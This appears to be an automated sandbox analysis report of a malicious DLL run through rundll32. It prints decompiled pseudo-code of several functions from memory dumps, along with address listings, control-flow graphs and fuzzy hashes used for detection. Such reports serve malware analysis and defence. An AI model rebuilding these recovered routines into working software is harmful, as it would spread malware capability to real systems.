                                                                                                                                                                                                                                    						_t51 =  *_t73;
                                                                                                                                                                                                                                    						if(_t51 != 0) {
                                                                                                                                                                                                                                    							__imp__( *0x4c3d238, 0, _t51);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t73 = _t73 + 0x10;
                                                                                                                                                                                                                                    						_t65 = _t65 - 1;
                                                                                                                                                                                                                                    					} while (_t65 != 0);
                                                                                                                                                                                                                                    					__imp__(_v44);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                    				goto L25;
                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                    0x04c36805
                                                                                                                                                                                                                                    0x04c36808
                                                                                                                                                                                                                                    0x04c3680d
                                                                                                                                                                                                                                    0x04c36818
                                                                                                                                                                                                                                    0x04c36818
                                                                                                                                                                                                                                    0x04c3680f
                                                                                                                                                                                                                                    0x04c3680f
                                                                                                                                                                                                                                    0x04c36816
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c36816
                                                                                                                                                                                                                                    0x04c36822
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c36825
                                                                                                                                                                                                                                    0x04c36829
                                                                                                                                                                                                                                    0x04c36834
                                                                                                                                                                                                                                    0x04c36834
                                                                                                                                                                                                                                    0x04c3683b
                                                                                                                                                                                                                                    0x04c36844
                                                                                                                                                                                                                                    0x04c3684b
                                                                                                                                                                                                                                    0x04c36854
                                                                                                                                                                                                                                    0x04c36857
                                                                                                                                                                                                                                    0x04c3685a
                                                                                                                                                                                                                                    0x04c36861
                                                                                                                                                                                                                                    0x04c36864
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c36866
                                                                                                                                                                                                                                    0x04c36869
                                                                                                                                                                                                                                    0x04c3686c
                                                                                                                                                                                                                                    0x04c3686f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c36871
                                                                                                                                                                                                                                    0x04c36880
                                                                                                                                                                                                                                    0x04c36880
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c368ae
                                                                                                                                                                                                                                    0x04c368ae
                                                                                                                                                                                                                                    0x04c368b3
                                                                                                                                                                                                                                    0x04c368d2
                                                                                                                                                                                                                                    0x04c368d4
                                                                                                                                                                                                                                    0x04c368d9
                                                                                                                                                                                                                                    0x04c368da
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c368b5
                                                                                                                                                                                                                                    0x04c368b5
                                                                                                                                                                                                                                    0x04c368bb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c368bd
                                                                                                                                                                                                                                    0x04c368bd
                                                                                                                                                                                                                                    0x04c368c2
                                                                                                                                                                                                                                    0x04c368c4
                                                                                                                                                                                                                                    0x04c368c9
                                                                                                                                                                                                                                    0x04c368ca
                                                                                                                                                                                                                                    0x04c368e0
                                                                                                                                                                                                                                    0x04c368e0
                                                                                                                                                                                                                                    0x04c368e8
                                                                                                                                                                                                                                    0x04c368f3
                                                                                                                                                                                                                                    0x04c368f6
                                                                                                                                                                                                                                    0x04c36901
                                                                                                                                                                                                                                    0x04c36903
                                                                                                                                                                                                                                    0x04c36905
                                                                                                                                                                                                                                    0x04c36908
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3690e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3690e
                                                                                                                                                                                                                                    0x04c36908
                                                                                                                                                                                                                                    0x04c368bb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c368b3
                                                                                                                                                                                                                                    0x04c36883
                                                                                                                                                                                                                                    0x04c36885
                                                                                                                                                                                                                                    0x04c36888
                                                                                                                                                                                                                                    0x04c36889
                                                                                                                                                                                                                                    0x04c36889
                                                                                                                                                                                                                                    0x04c3688d
                                                                                                                                                                                                                                    0x04c36897
                                                                                                                                                                                                                                    0x04c36897
                                                                                                                                                                                                                                    0x04c3689d
                                                                                                                                                                                                                                    0x04c368a0
                                                                                                                                                                                                                                    0x04c368a0
                                                                                                                                                                                                                                    0x04c368a6
                                                                                                                                                                                                                                    0x04c368a6
                                                                                                                                                                                                                                    0x04c36923
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 00b1e5946dbc9184d2c3ecca9b79641a024c43d3cce192bc2dd26874098b309a
                                                                                                                                                                                                                                    • Instruction ID: 48ce6cff417ba93398e5ffb0920d9757949738d6c3886166f765129e705a141d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00b1e5946dbc9184d2c3ecca9b79641a024c43d3cce192bc2dd26874098b309a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01517CB5901228BBDF20DF94DC44EEEBFB9EF49326F204116F811B2180D775AA40DBA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 395 4c39152-4c39178 397 4c39246-4c3924c 395->397 398 4c3917e-4c3919b call 4c33aef 395->398 401 4c391a1-4c391a6 398->401 402 4c3923d-4c39242 398->402 403 4c391a8-4c391ab 401->403 404 4c391be-4c391c0 401->404 402->397 403->404 406 4c391ad-4c391bc 403->406 404->402 405 4c391c2-4c391e0 404->405 407 4c391e4-4c391e8 405->407 406->404 409 4c39216-4c3921b 407->409 410 4c391ea-4c391f6 call 4c37c14 407->410 412 4c39223-4c3922c 409->412 413 4c3921d-4c3921f 409->413 410->409 418 4c391f8-4c391fd 410->418 415 4c39233-4c39236 412->415 416 4c3922e 412->416 413->412 415->402 417 4c39238 415->417 416->415 417->402 418->409 419 4c391ff-4c39202 418->419 419->409 420 4c39204-4c39214 419->420 420->409
                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                    			E04C39152(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				intOrPtr* _t35;
                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                    				intOrPtr* _t41;
                                                                                                                                                                                                                                    				intOrPtr* _t43;
                                                                                                                                                                                                                                    				intOrPtr* _t45;
                                                                                                                                                                                                                                    				intOrPtr* _t50;
                                                                                                                                                                                                                                    				intOrPtr* _t52;
                                                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                                                    				intOrPtr* _t55;
                                                                                                                                                                                                                                    				intOrPtr* _t57;
                                                                                                                                                                                                                                    				intOrPtr* _t61;
                                                                                                                                                                                                                                    				intOrPtr* _t65;
                                                                                                                                                                                                                                    				intOrPtr _t68;
                                                                                                                                                                                                                                    				void* _t72;
                                                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                                                    				void* _t76;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t55 = _a4;
                                                                                                                                                                                                                                    				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                                                                                                                                                                                                    				_a4 = 0;
                                                                                                                                                                                                                                    				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                                                                                                                                                                                                    				if(_t76 < 0) {
                                                                                                                                                                                                                                    					L18:
                                                                                                                                                                                                                                    					return _t76;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t40 = E04C33AEF(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                                                                                                                                                                                                    				_t76 = _t40;
                                                                                                                                                                                                                                    				if(_t76 >= 0) {
                                                                                                                                                                                                                                    					_t61 = _a28;
                                                                                                                                                                                                                                    					if(_t61 != 0 &&  *_t61 != 0) {
                                                                                                                                                                                                                                    						_t52 = _v8;
                                                                                                                                                                                                                                    						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t76 >= 0) {
                                                                                                                                                                                                                                    						_t43 =  *_t55;
                                                                                                                                                                                                                                    						_t68 =  *0x4c3d27c; // 0xa6a5a8
                                                                                                                                                                                                                                    						_t20 = _t68 + 0x4c3e1fc; // 0x740053
                                                                                                                                                                                                                                    						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                                                                                                                                                                                                    						if(_t76 >= 0) {
                                                                                                                                                                                                                                    							_t76 = E04C37C14(_a4);
                                                                                                                                                                                                                                    							if(_t76 >= 0) {
                                                                                                                                                                                                                                    								_t65 = _a28;
                                                                                                                                                                                                                                    								if(_t65 != 0 &&  *_t65 == 0) {
                                                                                                                                                                                                                                    									_t50 = _a4;
                                                                                                                                                                                                                                    									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t45 = _a4;
                                                                                                                                                                                                                                    						if(_t45 != 0) {
                                                                                                                                                                                                                                    							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t57 = __imp__#6; // 0x7414d5b0
                                                                                                                                                                                                                                    						if(_a20 != 0) {
                                                                                                                                                                                                                                    							 *_t57(_a20);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if(_a12 != 0) {
                                                                                                                                                                                                                                    							 *_t57(_a12);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t41 = _v8;
                                                                                                                                                                                                                                    				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                                                                                                                                                                                                    				goto L18;
                                                                                                                                                                                                                                    			}






















Memory Dump Source
• Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
• Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
• Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
• Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 25a97b9a5a60192edb3f4f8a165e3db89ddc90547f71c48394f4f338e114e70c
                                                                                                                                                                                                                                    • Instruction ID: da817ced5ade57a79397a5ef7d1ca2a9f18b54d2122286d21e8675f0e243d0b8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 25a97b9a5a60192edb3f4f8a165e3db89ddc90547f71c48394f4f338e114e70c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11317CB6900518AFCB21DFA5C888CAFBB7AFFC97417144658F8159B210E372ED51DBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                                                    			E04C373FD(void* __edx) {
                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                    				intOrPtr _t24;
                                                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                                                    				intOrPtr _t32;
                                                                                                                                                                                                                                    				intOrPtr _t35;
                                                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                    				intOrPtr _t42;
                                                                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                                                                    				void* _t50;
                                                                                                                                                                                                                                    				intOrPtr* _t52;
                                                                                                                                                                                                                                    				void* _t55;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t50 = __edx;
                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                    				_t23 = E04C3A72D(0,  &_v8); // executed
                                                                                                                                                                                                                                    				if(_t23 != 0) {
                                                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t24 =  *0x4c3d27c; // 0xa6a5a8
                                                                                                                                                                                                                                    				_t4 = _t24 + 0x4c3ede0; // 0x56a9388
                                                                                                                                                                                                                                    				_t5 = _t24 + 0x4c3ed88; // 0x4f0053
                                                                                                                                                                                                                                    				_t26 = E04C31262( &_v16, _v8, _t5, _t4); // executed
                                                                                                                                                                                                                                    				_t45 = _t26;
                                                                                                                                                                                                                                    				if(_t45 == 0) {
                                                                                                                                                                                                                                    					 *0x4c3d0f4(_v16, 0,  &_v12);
                                                                                                                                                                                                                                    					_t52 = __imp__; // 0x76d25520
                                                                                                                                                                                                                                    					_t45 = 8;
                                                                                                                                                                                                                                    					if(_v12 < _t45) {
                                                                                                                                                                                                                                    						_t45 = 1;
                                                                                                                                                                                                                                    						__eflags = 1;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t32 =  *0x4c3d27c; // 0xa6a5a8
                                                                                                                                                                                                                                    						_t11 = _t32 + 0x4c3edd4; // 0x56a937c
                                                                                                                                                                                                                                    						_t48 = _t11;
                                                                                                                                                                                                                                    						_t12 = _t32 + 0x4c3ed88; // 0x4f0053
                                                                                                                                                                                                                                    						_t55 = E04C37CB8(_t11, _t12, _t11);
                                                                                                                                                                                                                                    						_t59 = _t55;
                                                                                                                                                                                                                                    						if(_t55 != 0) {
                                                                                                                                                                                                                                    							_t35 =  *0x4c3d27c; // 0xa6a5a8
                                                                                                                                                                                                                                    							_t13 = _t35 + 0x4c3ee1e; // 0x30314549
                                                                                                                                                                                                                                    							_t37 = E04C389D6(_t48, _t50, _t59, _v8, _t55, _t13, 0x14); // executed
                                                                                                                                                                                                                                    							if(_t37 == 0) {
                                                                                                                                                                                                                                    								_t61 =  *0x4c3d25c - 6;
                                                                                                                                                                                                                                    								if( *0x4c3d25c <= 6) {
                                                                                                                                                                                                                                    									_t42 =  *0x4c3d27c; // 0xa6a5a8
                                                                                                                                                                                                                                    									_t15 = _t42 + 0x4c3ec2a; // 0x52384549
                                                                                                                                                                                                                                    									E04C389D6(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t38 =  *0x4c3d27c; // 0xa6a5a8
                                                                                                                                                                                                                                    							_t17 = _t38 + 0x4c3ee18; // 0x56a93c0
                                                                                                                                                                                                                                    							_t18 = _t38 + 0x4c3edf0; // 0x680043
                                                                                                                                                                                                                                    							_t40 = E04C32659(_v8, 0x80000001, _t55, _t18, _t17);
                                                                                                                                                                                                                                    							_t45 = _t40;
                                                                                                                                                                                                                                    							 *_t52( *0x4c3d238, 0, _t55);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					 *_t52( *0x4c3d238, 0, _v16);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t54 = _v8;
                                                                                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                                                                                    					E04C31F99(_t54);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t45;
                                                                                                                                                                                                                                    			}





















                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 6ed4306fa152e8d6b1574dd890a9a572cc295771f9aeff849bc01777de912ab5
                                                                                                                                                                                                                                    • Instruction ID: 0fd2fd2a9c3fe9e00878c4bb461d9352341763de12b3c7c996ad100e42f7b950
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ed4306fa152e8d6b1574dd890a9a572cc295771f9aeff849bc01777de912ab5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 533181B5901108BFEB11DBA0DC84EAA7BBDEF44706F158055B601A7161D775FE04EF50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 500 4c37b5d-4c37b91 502 4c37b93-4c37b96 500->502 503 4c37c0b-4c37c11 500->503 504 4c37bb3-4c37bcd 502->504 505 4c37b98-4c37bb0 call 4c3908b 502->505 509 4c37bf8-4c37bfa 504->509 510 4c37bcf-4c37bd9 504->510 505->504 511 4c37c02-4c37c07 509->511 512 4c37bfc-4c37bfe 509->512 513 4c37be2-4c37be9 510->513 511->503 512->511 514 4c37bf2-4c37bf4 513->514 515 4c37beb-4c37bf0 513->515 514->509 515->509
                                                                                                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                                                                                                    			E04C37B5D(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                    				intOrPtr _t22;
                                                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                                                    				intOrPtr* _t26;
                                                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                                                    				intOrPtr* _t33;
                                                                                                                                                                                                                                    				intOrPtr _t36;
                                                                                                                                                                                                                                    				intOrPtr* _t39;
                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t22 =  *0x4c3d27c; // 0xa6a5a8
                                                                                                                                                                                                                                    				_t2 = _t22 + 0x4c3e0dc; // 0x56a8684
                                                                                                                                                                                                                                    				_t3 = _t22 + 0x4c3e0cc; // 0x4590f811
                                                                                                                                                                                                                                    				_t39 = 0;
                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                    				_t24 =  *0x4c3d15c(_t3, 0, 1, _t2,  &_v16); // executed
                                                                                                                                                                                                                                    				_t46 = _t24;
                                                                                                                                                                                                                                    				if(_t46 >= 0) {
                                                                                                                                                                                                                                    					if(_a8 != 0) {
                                                                                                                                                                                                                                    						_t36 =  *0x4c3d27c; // 0xa6a5a8
                                                                                                                                                                                                                                    						_t8 = _t36 + 0x4c3e3b8; // 0x5f005f
                                                                                                                                                                                                                                    						E04C3908B(_t8, _a8,  &_v12);
                                                                                                                                                                                                                                    						_t39 = _v12;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t26 = _v16;
                                                                                                                                                                                                                                    					_t46 =  *((intOrPtr*)( *_t26 + 0xc))(_t26, _a4, 0, 0, 0, 0, 0, _t39,  &_v8);
                                                                                                                                                                                                                                    					if(_t46 >= 0) {
                                                                                                                                                                                                                                    						_t32 =  *0x4c3d158(_v8, 0xa, 0, 0, 3, 3, 0, 0); // executed
                                                                                                                                                                                                                                    						_t46 = _t32;
                                                                                                                                                                                                                                    						_t33 = _v8;
                                                                                                                                                                                                                                    						if(_t46 < 0) {
                                                                                                                                                                                                                                    							 *((intOrPtr*)( *_t33 + 8))(_t33);
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							 *_a12 = _t33;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t39 != 0) {
                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t39 + 8))(_t39);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t28 = _v16;
                                                                                                                                                                                                                                    					 *((intOrPtr*)( *_t28 + 8))(_t28);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t46;
                                                                                                                                                                                                                                    			}
















                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: f47665f5d3291e51a3c268ea40042e4f13f7accf4a53bcb33b487deed12d668a
                                                                                                                                                                                                                                    • Instruction ID: 039e3d144167b16f4d1adb15a8c8c88be501d5aa3f5cea15f9965be73b7b92f7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f47665f5d3291e51a3c268ea40042e4f13f7accf4a53bcb33b487deed12d668a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3217FB5601218BFCB10DFA4C888D9EBBBEEF89B56F008495F506DB240C631EE01DB60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 516 4c383b7-4c38406 518 4c38479-4c3847e 516->518 519 4c38408-4c38419 516->519 521 4c38470 519->521 522 4c3841b-4c3843b call 4c32049 519->522 521->518 526 4c38466 522->526 527 4c3843d-4c38447 522->527 528 4c3846f 526->528 529 4c3844c-4c3844e 527->529 528->521 530 4c38460-4c38461 call 4c39039 529->530 531 4c38450-4c3845f call 4c35544 529->531 530->526 531->530
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: bcba8e027b34aaddf07a613a0a167c7601d4ab87baf305f19d51e6e22195539e
                                                                                                                                                                                                                                    • Instruction ID: 4517b76a695fd50d4085254006fdb467cd267a65fa266406600c53f6ad95f3b0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcba8e027b34aaddf07a613a0a167c7601d4ab87baf305f19d51e6e22195539e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9521E6B6900228BBDF11AF95CC85ADEBFBEEF08751F104066FA04B6110D7759A44AFA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 535 4c343df-4c343ef call 4c32049 538 4c34495-4c34498 535->538 539 4c343f5-4c3440c 535->539 540 4c3449d-4c3449f 538->540 541 4c34413-4c34418 539->541 542 4c3448a-4c34493 call 4c39039 541->542 543 4c3441a-4c3443d 541->543 542->540 547 4c3443f-4c34458 543->547 548 4c3447e 543->548 552 4c34472-4c3447c 547->552 553 4c3445a-4c34470 547->553 549 4c34482-4c34488 548->549 549->542 551 4c3449a 549->551 551->540 552->548 553->549
                                                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                                                    			E04C343DF(void* __ebx, void* __ecx, void* __edi, signed int _a4) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                                                    				signed int _t21;
                                                                                                                                                                                                                                    				intOrPtr _t22;
                                                                                                                                                                                                                                    				intOrPtr* _t26;
                                                                                                                                                                                                                                    				signed int _t27;
                                                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                                                                                    				intOrPtr* _t30;
                                                                                                                                                                                                                                    				intOrPtr* _t32;
                                                                                                                                                                                                                                    				intOrPtr* _t35;
